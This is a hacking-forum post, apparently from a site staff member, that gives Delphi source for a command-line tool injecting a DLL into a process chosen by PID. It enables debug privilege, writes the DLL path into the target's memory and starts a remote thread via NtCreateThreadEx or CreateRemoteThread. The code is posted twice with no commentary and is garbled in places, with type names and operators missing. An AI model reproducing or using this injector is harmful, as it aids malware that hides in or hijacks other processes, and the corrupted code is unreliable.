dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,862
- Solutions
- 4
- Reputation
- 32
- Reaction score
- 45,552
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
[LENGUAJE=delphi]program Inject;
{$APPTYPE CONSOLE}
{$IF CompilerVersion >= 21.0}
{$WEAKLINKRTTI ON}
{$RTTI EXPLICIT METHODS([]) PROPERTIES([]) FIELDS([])}
{$IFEND}
uses
Winapi.Windows;
Type
NtCreateThreadExProc = Function(Var hThread:THandle; Access
WORD; Attributes
ointer; hProcess:THandle; pStartointer; pParameterointer; Suspended:BOOL; StackSize, u1, u2WORD; Unknownointer)WORD; stdcall;
Function StrToInt(S: String): Integer;
Var
E: Integer;
Begin
Val(S, Result, E);
End;
Function CheckOs():Boolean;
Var
lpVersion :TOSVersionInfoW;
begin
Result := False;
If GetVersionExW(lpVersion) Then
If (lpVersion.dwPlatformId = VER_PLATFORM_WIN32_NT) then
If (lpVersion.dwMajorVersion
Result := True;
end;
Function EnableDebugPrivilege():Boolean;
Var
hToKen :THandle;
TokenPri :TTokenPrivileges;
dwRetWORD;
begin
Result := False;
if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES, hToKen)) Then
begin
TokenPri.PrivilegeCount := 1;
If LookupPrivilegeValueW(Nil, 'SeDebugPrivilege', TokenPri.Privileges[0].Luid) Then
begin
TokenPri.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
Result := AdjustTokenPrivileges(hToken, False, TokenPri, SizeOf(TTokenPrivileges), Nil, dwRet);
end;
CloseHandle(hToKen);
end;
end;
Function RemoteThread(hProcess:THandle; pThreadProcointer; pRemoteointer):THandle;
Label NtCreate, Create;
Var
pFuncointer;
hThread :THandle;
ThreadIdWORD;
begin
hThread := 0;
if Not CheckOs() then
begin
NtCreate:
pFunc := GetProcAddress(LoadLibraryW('ntdll.dll'), 'NtCreateThreadEx');
if pFunc = Nil then Goto Create;
NtCreateThreadExProc(pFunc)(hThread, $1FFFFF, Nil, hProcess, pThreadProc, pRemote, False, 0, 0, 0, Nil);
if hThread = 0 then Goto Create;
end Else
begin
Create:
hThread := CreateRemoteThread(hProcess, Nil, 0, pThreadProc, pRemote, 0, ThreadId);
end;
Result := hThread;
end;
Function InjectDll2Pid(szPathWideChar; dwPIDWORD):Boolean;
Var
hProcess :THandle;
hThread :THandle;
szRemoteWideChar;
uSize :SIZE_T;
uWrite :SIZE_T;
pStartAddrointer;
begin
Result := False;
if EnableDebugPrivilege then
begin
hProcess := OpenProcess(PROCESS_ALL_ACCESS, false, dwPID);
if hProcess > 0 then
begin
uSize := lstrlenW(szPath) * 2 + 4;
szRemote := VirtualAllocEx(hProcess, Nil, uSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if WriteProcessMemory(hProcess, szRemote, szPath, uSize, uWrite) And (uWrite = uSize) then
begin
pStartAddr := GetProcAddress(LoadLibrary('Kernel32.dll'), 'LoadLibraryW');
hThread := RemoteThread(hProcess, pStartAddr, szRemote);
Result := hThread 0;
CloseHandle(hThread);
end;
end;
end;
end;
begin
If InjectDll2Pid(PWideChar(ParamStr(2)), StrToInt(ParamStr(1))) Then
begin
Writeln('RemoteThread Ok!');
end;
end.[/LENGUAJE]
{$APPTYPE CONSOLE}
{$IF CompilerVersion >= 21.0}
{$WEAKLINKRTTI ON}
{$RTTI EXPLICIT METHODS([]) PROPERTIES([]) FIELDS([])}
{$IFEND}
uses
Winapi.Windows;
Type
NtCreateThreadExProc = Function(Var hThread:THandle; Access
WORD; Attributesointer; hProcess:THandle; pStartointer; pParameterointer; Suspended:BOOL; StackSize, u1, u2WORD; Unknownointer)WORD; stdcall;Function StrToInt(S: String): Integer;
Var
E: Integer;
Begin
Val(S, Result, E);
End;
Function CheckOs():Boolean;
Var
lpVersion :TOSVersionInfoW;
begin
Result := False;
If GetVersionExW(lpVersion) Then
If (lpVersion.dwPlatformId = VER_PLATFORM_WIN32_NT) then
If (lpVersion.dwMajorVersion
Result := True;
end;
Function EnableDebugPrivilege():Boolean;
Var
hToKen :THandle;
TokenPri :TTokenPrivileges;
dwRet
WORD;begin
Result := False;
if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES, hToKen)) Then
begin
TokenPri.PrivilegeCount := 1;
If LookupPrivilegeValueW(Nil, 'SeDebugPrivilege', TokenPri.Privileges[0].Luid) Then
begin
TokenPri.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
Result := AdjustTokenPrivileges(hToken, False, TokenPri, SizeOf(TTokenPrivileges), Nil, dwRet);
end;
CloseHandle(hToKen);
end;
end;
Function RemoteThread(hProcess:THandle; pThreadProc
ointer; pRemoteointer):THandle;Label NtCreate, Create;
Var
pFunc
ointer;hThread :THandle;
ThreadId
WORD;begin
hThread := 0;
if Not CheckOs() then
begin
NtCreate:
pFunc := GetProcAddress(LoadLibraryW('ntdll.dll'), 'NtCreateThreadEx');
if pFunc = Nil then Goto Create;
NtCreateThreadExProc(pFunc)(hThread, $1FFFFF, Nil, hProcess, pThreadProc, pRemote, False, 0, 0, 0, Nil);
if hThread = 0 then Goto Create;
end Else
begin
Create:
hThread := CreateRemoteThread(hProcess, Nil, 0, pThreadProc, pRemote, 0, ThreadId);
end;
Result := hThread;
end;
Function InjectDll2Pid(szPath
WideChar; dwPIDWORD):Boolean;Var
hProcess :THandle;
hThread :THandle;
szRemote
WideChar;uSize :SIZE_T;
uWrite :SIZE_T;
pStartAddr
ointer;begin
Result := False;
if EnableDebugPrivilege then
begin
hProcess := OpenProcess(PROCESS_ALL_ACCESS, false, dwPID);
if hProcess > 0 then
begin
uSize := lstrlenW(szPath) * 2 + 4;
szRemote := VirtualAllocEx(hProcess, Nil, uSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if WriteProcessMemory(hProcess, szRemote, szPath, uSize, uWrite) And (uWrite = uSize) then
begin
pStartAddr := GetProcAddress(LoadLibrary('Kernel32.dll'), 'LoadLibraryW');
hThread := RemoteThread(hProcess, pStartAddr, szRemote);
Result := hThread 0;
CloseHandle(hThread);
end;
end;
end;
end;
begin
If InjectDll2Pid(PWideChar(ParamStr(2)), StrToInt(ParamStr(1))) Then
begin
Writeln('RemoteThread Ok!');
end;
end.[/LENGUAJE]